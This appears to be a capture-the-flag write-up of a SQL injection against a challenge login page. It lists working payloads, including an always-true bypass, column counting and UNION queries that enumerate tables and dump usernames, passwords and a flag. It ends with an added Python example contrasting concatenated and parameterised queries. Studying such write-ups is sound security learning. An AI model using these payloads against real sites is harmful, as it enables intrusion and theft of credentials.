Test for single-quote injection
1'
Response:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'password'' at line 1
Master key (always-true condition)
1' or 1=1#
Response:
Your password is'22ec72d47e489fbbdf39acd7a87f99ac'
Test the number of fields
admin' order by 4#
Response:
Unknown column '4' in 'order clause'
This shows there are four fields; the guess is: id, username, password
Test which fields are echoed back
1' union select 1,2,3#
Response:
Hello 2!
Your password is '3'
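Positions 2 and 3 are echoed back: 2 stands for the username and 3 for the password
Next, the echo at positions 2 and 3 can be used for injection
Enumerate the tables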
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
Response:
Hello 2!
Your password is 'geekuser,l0ve1ysq1'
This shows two tables: geekuser and l0ve1ysq1
View the columns of each table
geekuser table
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#
Response:
Hello 2!
Your password is 'id,username,password'
l0ve1ysq1 table
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
Response:
Hello 2!
Your password is 'id,username,password'
Query the tables
geekuser
1' union select 1,2,group_concat(id,username,password) from geekuser#
Response:
Hello 2!
Your password is '1adminef4087e987fdee056a7d7eb6f611d235'
l0ve1ysq1
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
Response:
Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{ac289490-df8d-4a2c-a934-e56fbcd2d8c2}'
Flag obtained
flag{ac289490-df8d-4a2c-a934-e56fbcd2d8c2}
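Why the inputs above work, and the fix, as an added example that is not part of the original writeup or the challenge's code: the same login query built by string concatenation and with bound parameters. Assumptions: the query shape, the users table, the function names and the stored password are hypothetical, and SQLite stands in for MariaDB, so the '#' comment is written as '-- '.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the challenge database (SQLite, not MariaDB).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-secret')")
    return db

def login_vulnerable(db, username, password):
    # Assumed shape of the challenge query: input is pasted into the SQL text,
    # so a quote in `username` ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT id, username, password FROM users "
           f"WHERE username='{username}' AND password='{password}'")
    try:
        return db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        # Echoing the database error is what confirms the single-quote test.
        return f"SQL error: {exc}"

def login_safe(db, username, password):
    # Placeholders send the values separately from the SQL text; quotes,
    # UNION and comment markers stay inside the compared string.
    sql = "SELECT id, username, password FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password)).fetchone()

# Inputs from the walkthrough; '#' is replaced by '-- ' because SQLite has no '#' comment.
PAGE_INPUTS = ["1'", "1' or 1=1-- ", "1' union select 1,2,3-- "]

def compare(db):
    # For each input: (input, result of concatenated query, result of bound query).
    return [(p, login_vulnerable(db, p, "x"), login_safe(db, p, "x"))
            for p in PAGE_INPUTS]

if __name__ == "__main__":
    for payload, vuln, safe in compare(make_db()):
        print(f"{payload!r:30} vulnerable={vuln!r} safe={safe!r}")
```

With bound parameters every input from the walkthrough is compared as a literal username and matches no row; returning a generic failure message instead of the database error also removes the syntax-error echo.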